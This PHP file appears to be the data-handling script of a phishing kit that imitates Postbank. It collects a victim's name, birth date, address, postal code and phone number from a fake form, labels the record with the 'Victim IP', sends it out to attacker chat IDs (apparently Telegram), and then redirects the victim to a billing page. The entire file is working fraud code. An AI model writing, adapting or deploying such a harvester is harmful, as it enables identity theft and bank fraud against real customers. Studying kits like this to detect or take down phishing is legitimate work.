<?php 
require '../../main.php';
require "fun.php";

if(isset($_POST['oneid'])){
$type = post('oneid');
$logn = post('oneid1');
$log = post('oneid5');
$Adres = post('oneid2');
$zipo = post('oneid3');
$tel = post('oneid4');
$res = urlencode("
➡️ POSTBANK Result ..
🌐 Victim IP : ".ip()."

👳‍Vorname : $type
👳‍ Nachname : $Adres
🎂 Date : $logn
🏠 Adress : $log
📫 PLZ : $zipo
📱Tel : $tel
   
   ⭐⭐⭐
   
   ⚡️丂 卄 卂 ᗪ ㄖ 山 ㄥ 乇 ᘜ 乇 几 ᗪ ™️ ⚡️
");
foreach($chat_ids as $chat_id){
	send($res, $chat_id);
}

//go("../wait.php?userid={$id}&ue={$ue}?page=Login");
go("../wait.php?page=BILLING");
//go("../passos.php?userid={$id}&ue={$ue}&page=Login");
//header("Location: ../pasos.php?page=Login");
//exit();

}